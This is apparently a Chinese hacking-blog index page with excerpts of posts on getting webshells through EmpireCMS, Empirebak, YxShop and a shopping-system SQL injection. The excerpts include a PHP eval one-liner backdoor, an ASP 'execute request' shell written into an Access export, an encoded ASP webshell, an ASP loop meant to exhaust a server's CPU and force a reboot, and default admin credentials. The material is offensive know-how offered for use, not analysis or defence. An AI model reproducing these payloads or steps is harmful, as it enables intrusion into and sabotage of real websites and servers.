EmpireCMS(帝国)后台拿shell

管理模板 添加自定义页面 <\?php eval($_POST[baidu])?\> <%这个被过滤了所以必须这样写。 作者:killer 还是几个月前一个朋友让我看看帝国进后台能不能找到简单点拿shell的方法,因为他找的方法虽然达到目的了,但是过程很繁琐. 方法很简单,直接上传webshell.. 进入后台---系统设置---管理数据表---管理系统模型---导入新型模块,直...

- 阅读全文 -

WEBSHELL重启服务器的方法?

把下面代码保存成webshell.asp,然后访问。CPU暴。管理员重启。 <% for i = 1 to 100 i = 10 next %> DB-OWNER权限下让服务器重启    SQL命令:wHiLe 1<9 bEgIn sElEcT cHaR(0) eNd– 收集一下。会有用的哦!!

- 阅读全文 -

7个ASP小马合集~!

1号小马 <meta http-equiv="Content-Type" content="text/html; charset=gb2312"> <title>Cx~</title> <%@ LANGUAGE = VBScript.Encode %> <%#@~^CgAAAA==[b:~K4N0/K3QMAAA==^#~@%> <...

- 阅读全文 -

帝国备份王(Empirebak)拿webshell

帝国备份王(Empirebak)简介 EmpireBak是一款完全免费、专门为Mysql大数据的备份与导入而设计的软件,系统采用分卷备份与导入,理论上可备份任何大小的数据库. 可在 http://www.phome.net/ebak2008os/ 下载到 默认账号密码为 admin 123456 登陆后先备份一次数据 备份时可选择备份到的目录。。默认有个safemod 当然也可以是别的..这里以s...

- 阅读全文 -

YxShop 上传漏洞批量shell

这个是根据一篇文章来的思路 文章名字 好像叫做批量Getshell 一例吧 借用了里面在百度获取URL的代码!!自己写了上传shell的代码! php学的不是很好,大牛们看了就别踩了!! 这个主要是给大家批shell时拿来修改的! 这个是测试图 贴出来代码: <?php print_r(' [*]  Getshell for Exploits [-]  by : [email]cfking@...

- 阅读全文 -

access导出webshell

create table cmd(shell text) insert into cmd (shell) values('<%execute request(1)%>') SELECT shell into [fuck] in 'D:\web\me\backdoorx\asp.asp;x.xls' 'EXCEL 4.0;'from cmd  

- 阅读全文 -

alucar php webshell

一个PHP的webshell。老外那K来的,貌似很不错,跟C99,c98,c97那些差不了多少。 SHELL界面很黑很暴力。来张图。 alucar.php 下载:停止下载  

- 阅读全文 -

网趣网上购物系统时尚版 V最新漏洞拿WEBSHELL

西宁威势 今天周末,睡到中午才起床,刚上线,看到QQ好友辐射鱼给我留言,找我测试脚本漏洞。 辐射鱼 13:01:03 等我找个点. 辐射鱼 13:03:48 https://www.webshell.cc/price.asp?anid=62%20and%20exists%20(select%20*%20from%20cnhww) 辐射鱼 13:04:41 表cnhww.为啥不支持 order by ...

- 阅读全文 -